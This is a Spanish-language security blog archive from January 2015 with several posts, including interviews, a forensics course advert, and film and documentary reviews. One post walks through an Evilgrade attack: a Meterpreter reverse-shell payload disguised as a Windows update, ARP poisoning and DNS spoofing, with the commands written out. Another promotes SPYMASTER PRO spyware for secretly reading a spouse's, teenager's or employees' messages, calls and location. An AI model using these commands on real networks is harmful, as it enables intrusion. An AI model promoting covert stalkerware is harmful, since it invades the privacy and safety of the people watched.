Ads 468x60px

Image and video hosting by TinyPic

Featured Posts

sábado, 31 de enero de 2015

4 Prácticas Razones Para Usar la Aplicación Espía Para IPhone




En esta vida de ritmo rápido, las personas no tienen tiempo para conocer y comprender la realidad, incluso la de sus propios familiares. Debido a la escasez de tiempo, no hay momento para comprobar o seguir a la persona que él / ella piensa que les va a traicionar a él / ella.

Usted está ocupado trabajando duramente mientras su equipo de trabajo conspira alrededor. La contramedida a todos los problemas mencionados es un programa espía para iPhone. SPYMASTER PRO es un software que le ayuda a controlar de forma remota a la persona deseada de forma rápida.

Conozca 4 Puntos prodigiosos para saber por qué  una aplicación espía iPhone es importante:

#1. Atrapar a un conyuge infiel

Si usted siente que se está jugando a dos bandas por parte de su pareja amada deje de compadecerse y consiga el programa espía para iphone antes mencionado. Le ofrece una escalera mecánica directa para atrapar a su cónyuge en plena traición sin que ellos lo sepan.

Le permitirá conseguir la siguiente información indispensable del iPhone de su cónyuge:

Leer toda la conversación de texto como SMS, correos electrónicos, etc. hecho por él / ella a través de su dispositivo personal de Apple;

Tener una breve mirada en sus / sus detalles de las llamadas, todas las llamadas telefónicas entrantes y salientes, el resumen y el historial también. Compruebe si las llamadas realizadas en las horas extrañas;

#2. Controlar remotamente a adolescentes complicados


Los niños a medida que crecen ocultan sus secretos. Tienen la ventaja del amor que les procesas, empiezan a fabricar sus historias falsas para tratar de engañarle. Los padres siempre deben ser saber la información de todos sus hijos, lo que les gusta, lo que hacen, en el grupo al que pertenecen, ¿a dónde van, etc.? Así es como la fascinante aplicación espía iphone le puede ayudar a:

Al leer sus conversaciones de chat en WhatsApp, Facebook, BBM, Viber, etc. Usted puede saber de forma actualizada lo que realmente sus hijos adolescentes están haciendo

Saber si están siendo intimidados o sean ellos mismos los que intimidan, Al comprobar su función de seguimiento de URL del navegador, usted puede comprobar si son adictos a cualquier tipo de drogas, etc;

#3. Administrar su equipo de trabajo



¿Son de confianza sus empleados? ¿Mantienen el secreto confidencial de la empresa? ¿Son sus informes verdaderos? No se asuste con todas estas preguntas que están apareciendo en sus mentes, verifique su grado de lealtad con la ayuda de la revolucionaria aplicación espía para el iPhone, siga leyendo:
Compruebe si están visitando algún lugar no programado, mediante la detección de su actual ubicación a través de la localización del GPS;
Rebusque a través de su sección multimedia del iPhone y compruebe que no existen instantáneas, videos o clips de audio tomadas para sabotear la compañía.
#4. Rastree su Teléfono Pérdido


Puede localizar y rastrear su teléfono celular si tu iPhone tiene instalado SPYMASTER PRO. puede comprobar la ubicación GPS del teléfono perdido y el seguimiento de su iPhone sentado en su sala de estar.

La mejor parte de todo es que una vez que has comprado esta aplicación espía, se convierte en el modo imperceptible una vez que se instala en el teléfono celular deseado. ¡Esto ahorra tiempo y energía!

jueves, 29 de enero de 2015

Involución Capítulo 8

Hola a tod@s

Volvemos con la sección Involución, en la que analizaremos la estupidez humana con las preguntas más estúpidas jamas realizadas por la humanidad.











Todos podemos participar en esta nueva sección si estáis navegando por Internet y encontráis alguna de estas preguntas y/o respuestas en algún foro, no lo dudéis y enviárnoslo a nuestro correo: franciscojaviersantiagovazquez(at)gmail.com y os citaremos.

No seáis malos.

miércoles, 28 de enero de 2015

Un Minuto sin 01 con Dabo

Hola a tod@s

Hoy tenemos con nosotros a David Hernández, más conocido por todos como Dabo, David es cofundador y responsable del área de Hacking y Seguridad de la Información en APACHEctl.com y ponente habitual en congresos de seguridad como RootedCON, ConectaCON,MorterueloCON. 

1º ¿Quién es Dabo?

Un Debianita, aspirante a Alpinista, de Bilbao, cosecha del 71 viviendo felizmente desde hace 20 años en Gijón. Autodidacta por necesidad.


2º ¿Que sueles hacer cuando tienes tiempo libre?

Principalmente, además de estar con mi chica y los colegas, perderme por alguna montaña.


3º Si no hubieras sido informático, ¿A qué te hubieras dedicado?

No lo tengo muy claro, ¿quizás al periodismo?


4º El último libro que has leído.

Uno para interactuar mejor con una gran amiga Border Collie a la que mando un saludo (Vega;): "Entrenamiento con clicker, la base perfecta".


5º Tu plato favorito.

Huevos fritos con chorizo y patatas.


6º El último sueño raro que tuviste.

Lo siento pero no sabría decirte uno.


7º ¿Qué música sueles escuchar?

Reggae, Metal, Hip Hop, alterno según el día.


8º Lo último que piensas antes de dormirte.

No induzco ningún pensamiento en especial, lo que surja.


9º Lo primero que piensas cuando te levantas por la mañana.

"Nada de excusas y a caminar, correr, al gimnasio, montaña o lo que toque"


10º Lo primero que harías si fueras presidente.

Darme de baja en autónomos


https://ssl.gstatic.com/ui/v1/icons/mail/images/cleardot.gif

lunes, 26 de enero de 2015

Segunda Edición del curso online “Análisis Forense Digital en Profundidad” de Securízame

Hola a tod@s

Hoy os voy hablar de un curso que comienza el día 23 de febrero, organizado por Securízame: Análisis Forense Digital en Profundidad.

Sólo con saber que el curso está organizado por Securízame,  podemos garantizar que es de gran calidad. :D 



Contará con grandes profesionales del mundo forense, como los profesores: Lorenzo Martínez, Alfonso González de Lama, Álvaro Andrade, Jaime Andrés Restrepo, Juan Garrido, Pedro Sánchez, Gustavo Presman, Yago Jesús, José Aurelio García y Giovanni Cruz.

Esta edición han querido hacerla más completa que el año pasado, llegando a 104 horas de contenidos en streaming,  son  13 módulos :
  • Los módulos I y II son de 4 horas cada uno, y cuentan como uno.
  • Los otros 12 módulos son de 8 horas cada uno.

Índice del curso:
  • Módulo I – Informática Forense y Evidencia Digital – 4 horas – Profesor: Alfonso González de Lama
  • Módulo II – Delitos Informáticos y Criminalidad en Internet – 4 horas – Profesor: Álvaro Andrade
  • Módulo V: Análisis de sistema de ficheros NTFS. Los ficheros  del registro de Windows. Análisis de la memoria en Windows. Indicadores de compromiso  – 8 horas – Profesor: Pedro Sánchez
  • Módulo VI: Análisis Forense en Linux – 8 horas – Profesor: Lorenzo Martínez
  • Módulo VII: Análisis Forense de discos SSD, Malware y Amenazas – 8 horas – Profesores: Gustavo Presman y Yago Jesús
  • Módulo VIII Análisis Forense de Documentos – 8 horas – José Aurelio García Mateos
  • Módulo IX Análisis Forense de virtualización y RAID – 8 horas – Profesor: Gustavo Presman
  • Módulo X: Análisis Forense en Redes, antiforense, correos electrónicos y VoIP – 8 horas – Profesor: Giovanni Cruz
  • Módulo XI: Análisis Forense de aplicaciones Microsoft: Active Directory, IIS, SQL Server, Exchange – 8 horas – Profesor: Juan Garrido Caballero
  • Módulo XII: Análisis Forense de tarjetas SIM, Blackberry y Windows Phone – 8 horas – Profesor: Pedro Sánchez Cordero
  • Módulo XIII: Análisis Forense en IOS – 8 horas – Profesor: Jaime Andrés Restrepo
  • Módulo XIV: Análisis Forense en Android – 8 horas – Profesor: Lorenzo Martínez

Las plazas para acceder a este curso son limitadas. Por ello,  han definido un período de registro que va desde el 21 de Enero, al 13 de Febrero de 2015.

Para más información e inscripción  en este enlace

No lo dudes ¡Apúntate YA!

jueves, 22 de enero de 2015

Evilgrade

Hola a tod@s

Tenía ganas de conocer bien a fondo a Evilgrade, un framework para comprometer equipos en un test de intrusión a través de actualizaciones no legítimas. Cuenta con una amplia variedad de módulos, como Ccleaner, Quicktime, Java, Winamp, Virtualbox, Vmware, etc.


Para comenzar con la Poc, necesitaremos Metasploit, Ettercap y por su puesto Evilgrade. Lo primero que haremos es crear el payload malicioso, esto será el ejecutable de la actualización falsa.

Imagen 1: Creación Payload

En mi caso sería:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.134 LPORT=4444 X > /root/update.exe

Ahora es turno de Evilgrade, elegimos el modulo, yo me decante por las actualizaciones de Windows.:
config winupdate

Imagen 2: Elección Modulo Evilgrade

A continuación abrimos Ettercap, elegimos la interfaz de red.

Imagen 3: Interfaz de red


Procedemos a escanear la red y listar los host que se van a spoofear, el target 1 será la puerta de enlace y el target 2 la maquina víctima, a continuación nos situamos en la pestaña Mitm y hacer click en Arp poisoning.

Imagen 4: Configuración Ettercap

Para terminar con Ettercap activamos el plugin dns spoof.

Imagen 5: Plugin dns spoof

Ahora volvemos a Evilgrade y especificamos la ruta del payload que creamos anteriormente.
set agent /root/update.exe
start

Imagen 6: Identificar agent

Ya podemos probar el ataque, para ello lanzamos start en Evilgrade y Ettercap, por otro lado igualmente dejamos listo Metasploit, para ello vamos a dejar a la escucha.
msfcli exploit/multi/handler/ PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.34 LPORT=4444 E

Imagen 7: Windows Update

A continuación vamos a la maquina víctima y actualizamos Windows.

Imagen 8: Descarga Payload Malicioso

Como vemos nos descargamos el update.exe

Imagen 9: Sesión exitosa Meterpreter

Como vemos nos descargamos el update.exe y el atacante observará una bonita sesión exitosa de Meterpreter y partir de ahí como dice mi amigo Pablo "El límite es tu imaginación"

Nota: El archivo etter.dns de vuestra maquina debe estar definido vuestra ip local con la web a spoofear, por ejemplo:
192.168.1.134 A update.microsoft.com


No seáis malos.

miércoles, 21 de enero de 2015

¿Donde está la ética?

Hola a tod@s

Después de la noticia de la lista de hackers, en la que se contrataría el servicio de profesionales de seguridad para actos poco éticos, nos encontramos con una web llamada Flexispy. Sólo con el nombre… esta web nos ofrece un software de monitoreo móvil.



Entre los servicios poco éticos que ofrece están:
  • Espiar mensajería instantánea, como WhatApp, Facebook, Skype o Line entre otras.
  • Intercepción de llamadas, escuchando y grabando estas.
  • Rastrear SMS.
  • Graba sonidos del entorno.
  • Rastreador de móviles con geoposicionamiento
  • Capturador de passwords

Como dicen en su web, atrapa a los infieles o monitorea sus empleados. Este tipo de sitios operan gracias a que tienen sus servidores en países donde este tipo delitos no están muy bien definidos y juegan con este vació legal.



No seáis malos.

lunes, 19 de enero de 2015

The Internet's Own Boy: The Story of Aaron Swartz

Hola a tod@s

El pasado viernes vi un documental de Aaron Swartz, titulado The Internet's Own Boy: The Story of Aaron Swartz. Me gusto mucho y por ello quiero compartir con la comunidad.

Para los que no lo conocierais, Aaron era una mente brillante que necesitaba saciar su curiosidad y ganas de aprender  desde muy pequeño. Una de sus primeras creaciones, con tan sólo 12 años fue un sitio web llamado The Info, donde los usuarios podían dejar información de distintos géneros, una fuente de sabiduría donde se compartía conocimiento, ¿no os suena? Si bastante similar a lo que hoy día conocemos como la Wikipedia, pero Aaron se anticipo años atrás. 

A los 14, fue el co-autor de las RSS 1.0, también contribuyo en el proyecto de las licencias Creative Commons, uno de sus proyectos más conocidos fue Reddit un sitio web de marcadores sociales y agregador de noticias donde los usuarios pueden dejar enlaces a contenidos web.

Aaron intentaba aportar su granito de arena para hacer un mundo un poco mejor. Huía del ego, la fama, el dinero, las grande empresas que ansían otros hackers.

Quería acceso a la información pública, creo una web llamada Open Library en la que se compartía libros e información.

Sus problemas con la justicia comenzaron desde que se "metió" con el MIT (Instituto Tecnológico de Massachusetts) y comenzó su lucha como activista y hacktivista. El FBI y la fiscalía no le daba tregua y acorralaron asfixiaron a Aaron hasta dejarlo agotado mentalmente y termino en su suicidio.

Swartz se enfrenaba a pasar 35 años en prisión y a pagar más de un millón de dólares en multas, pero ¿qué daño hizo? no rompió nada, no se puede crear penas similares a delitos mayores como el asesinato o la violación.


Me quedo con la anécdota del chico que gracias a Aaron tuvo acceso a información valiosa para sus estudios de investigación y gracias a ese trabajo de investigación encontró una manera de detectar de manera temprana uno de los canceres más mortales y que más tarde se detectaban el cáncer de páncreas.



No seáis malos.

jueves, 15 de enero de 2015

Kano el regalo perfecto para niños


Hola a tod@s

¿Nunca habéis estado dudando en que comprar a los más peques de la casa?

Aunque ya hemos pasado el día de reyes, aún tenemos la posibilidad de regalar en algún cumpleaños o comunión de un sobrino, primo, hijos de amigos o para los que ya seáis papas a vuestros niños.


Un regalo innovador y educativo para que el crío y tú alucinéis como es Kano, con un sistema operativo de código abierto para la exploración, la creación y reproducción. Montañas de código de en Minecraft y powerups en Pong. Música de sintetizador y stream de video. Sumérgete en la línea de comandos inventando algo nuevo.

El pack se completa con una scard, caja transparente, stickers para decorar, usb wifi, cable hdmi y teclado.

No seáis malos.

lunes, 12 de enero de 2015

Un minuto sin 01 con José Luis Verdeguer

Hola a tod@s

Vuelve un minuto sin 01, con uno de los tíos que más sabe de seguridad VoIP de España, José Luis  Verdeguer más conocido como Pepelux. Autor del libro Hacking y Seguridad VoIP y ponente habitual en congresos de seguridad. 


1º ¿Quién es José Luis? 

Soy un alicantino de 42 tacos que lleva interesado en la informática desde que hace 30 años vi un spectrum, y curioseando el mundo de la seguridad desde hace unos 20. 

Me considero una persona bastante inquieta y nunca me canso de trastear con cosas nuevas. Con todo lo que abarcan las nuevas tecnologías, creo que nunca llegaré a sentirme realizado. Tengo la suerte de dedicarme a lo que me gusta y, por tanto, todo el tiempo que invierto en aprender lo puedo aplicar al trabajo, o lo que es lo mismo, el tiempo dedicado al trabajo me sirve para aprender cosas nuevas cada día. En definitiva, quitando los marrones cotidianos, dedico muchas horas a I+D, intentando aprender y mejorar los sistemas y herramientas que utilizo en mi trabajo. 


2º ¿Que sueles hacer cuando tienes tiempo libre? 

No entiendo la pregunta ... ¿tiempo qué? :) 

Bueno, pues quitando el tiempo de curro y los compromisos, el poco que me queda me gusta estar con la familia, viajar, conocer otras culturas y así, desconectar un poco de la vida cotidiana. También intento ir a los congresos que puedo para aprender cosas nuevas y, como no, para reunirme con los amigos de otras ciudades o países que habitualmente no puedo ver. Y bueno, algún que otro fin de semana, también me gusta participar en algún CTF con los w3b0n3s, aunque cada vez tengo menos tiempo. 


3º Si no hubieras sido informático, ¿A qué te hubieras dedicado? 

Vete a saber. Yo decidí ir a la Universidad porque quería estudiar Informática y ahora mismo no concibo dedicarme a otra cosa. Si no hubiera podido dedicarme a esto, como alternativas me gusta la Electrónica y las Telecomunicaciones. 


4º El último libro que has leído. 

El último que terminé fue la hackstory, y ahora me estoy leyendo 'Kamailio SIP-Routing book'. Se trata de un borrador (el libro aún no está revisado) del primer libro de Kamailio que se ha editado (a parte de uno de Openser que se escribió en el año 2008) y que por cierto, lo ha escrito Daniel-Constantin Mierla junto a su mujer. Daniel es uno de los fundadores de Kamailio y su mujer colabora también en el proyecto. 


5º Tu plato favorito. 

Me gusta mucho cocinar y hay muchas comidas que me encantan, como el arroz con costra, la fabada asturiana, el cous cous, la fideua, o una buena paella valenciana. 


6º El último sueño raro que tuviste. 

La verdad es que nunca suelo acordarme de los sueños. 


7º ¿Qué música sueles escuchar? 

Depende el estado de ánimo y del momento. Por ejemplo cuando voy en el coche siempre pongo Rock FM, para programar suelo estar acompañado de Iron Maiden, Rosendo o Dover. Otras veces escucho a Joaquín Sabina, Estopa, Melendi, Fito, Metallica, Scorpions, ... depende el día y la situación. 


8º Lo último que piensas antes de dormirte. 

Cuando me acuesto siempre me pongo la tele y me duermo con ella, viendo alguna serie del tipo 'La que se avecina' o 'Mentes criminales'. Si no lo hago, mi mente empieza a repasar códigos y configuraciones :( 


9º Lo primero que piensas cuando te levantas por la mañana. 

Pienso en 2 cosas ... café y revisar el correo. 


10º Lo primero que harías si fueras presidente. 

Meter en la cárcel a todos los chorizos. 

Saludos!

jueves, 8 de enero de 2015

Blackhat la película

Hola a tod@s


Blackhat, la película, un film de acción y hackers protagonizada por Chirs Hemswort, conocido por películas como Thor.
La filmación de la película comenzó el 17 de mayo de 2013, en las ciudades de Los Ángeles (California), Hong Kong, Kuala Lumpur, Malaysia y Jakarta e Indonesia y que verán la luz en las salas de cines el próximo 30 de enero. Antes de su estreno hemos podido ver en el tráiler una buena dosis de acción, disparos, explosiones y hasta paseos en lancha.
El héroe de la película, el protagonista Hemsworth es un experto programador sentenciado a prisión que intentará neutralizar al “maligno hacker”, no sin antes violar la seguridad de la NSA y el Departamento de Defensa de EE.UU.
Los gobiernos estadounidenses y chinos se ven obligados a cooperar por el bien de la seguridad nacional de ambas potencias. Una fuerte amenaza informática está poniendo en riesgo las vidas y el futuro de la población. Sistemas SCADA, sistemas críticos, sitemas bancarios, etc.


En el momento en que te conectas, pierdes el control. Puedo apuntar a quien sea, lo que sea, donde sea. Sin huellas, sin rastros, sin piedad.



No seáis malos.
Related Posts Plugin for WordPress, Blogger...
 
"Los que consiguen que se rindan impotentes los ejércitos ajenos sin luchar son los mejores maestros del Arte de la Guerra"
Tzun Tzu.

 
cookie script